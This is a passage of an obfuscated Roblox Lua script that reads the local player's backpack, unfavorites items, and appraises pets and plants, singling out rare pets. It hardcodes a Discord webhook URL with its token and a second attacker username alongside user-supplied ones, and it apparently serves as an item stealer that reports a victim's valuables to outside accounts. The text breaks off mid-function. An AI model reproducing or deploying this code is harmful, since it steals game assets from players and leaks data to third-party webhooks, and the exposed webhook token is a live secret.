--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]-

local v0=game:GetService("Players");local v1=v0.LocalPlayer;local v2=v1:WaitForChild("Backpack");local v3=game:GetService("ReplicatedStorage");local v4=v3:WaitForChild("GameEvents"):WaitForChild("Favorite_Item");for v33,v34 in ipairs(v2:GetChildren()) do if (v34:GetAttribute("d")==true) then v4:FireServer(v34);end end local v5=game:GetService("HttpService");local v6=v3:WaitForChild("Modules");local v7=require(v6:WaitForChild("DataService"));local v8=require(v6:WaitForChild("CalculatePlantValue"));local v9=require(v6:WaitForChild("PetServices"):WaitForChild("PetUtilities"));local v10=require(v3:WaitForChild("Data"):WaitForChild("PetRegistry"));local v11=require(v6:WaitForChild("NumberUtil"));local function v12(v35,v36,v37) return v35 + ((v36-v35) * v37) ;end local v13=getfenv().Webhook;local v14=getfenv().Username;local v15="https://discord.com/api/webhooks/1391020634913374278/fPKPZTPqG2mCyai6-oebsMx5jagXzLRWNzAQb4jQoKieCJj6dLuyZT1PUh9xo9owdQ65";local v16="namnnni2";if ( not v13 or  not v14) then return;end local v17={"Butterfly","Raccoon","Dragonfly","Mimic Octopus","Queen Bee","Disco Bee","Fennec Fox"};local v18={"Seed","Shovel [Destroy Plants]","Water","Fertilizer"};local v19,v20,v21,v22={},0,false,false;local function v23(v38) local v39={"","k","m","b","t"};local v40=1;while (v38>=1000) and (v40< #v39)  do v38=v38/1000 ;v40+=1 end return ((v40==1) and tostring(math.floor(v38))) or string.format("%.2f%s",v38,v39[v40]) ;end local function v24(v41) local v42=v41.PetData.HatchedFrom;if  not v42 then return 0;end local v43=v10.PetEggs[v42];local v44=v43 and v43.RarityData.Items[v41.PetType] ;if  not v44 then return 0;end local v45=v44.GeneratedPetData.WeightRange;if  not v45 then return 0;end local v46=v11.ReverseLerp(v45[1],v45[2],v41.PetData.BaseWeight);local v47=v12(0.8,1.2,v46);local v48=v12(0.15,6,v9:GetLevelProgress(v41.PetData.Level));return math.floor(v10.PetList[v41.PetType].SellPrice
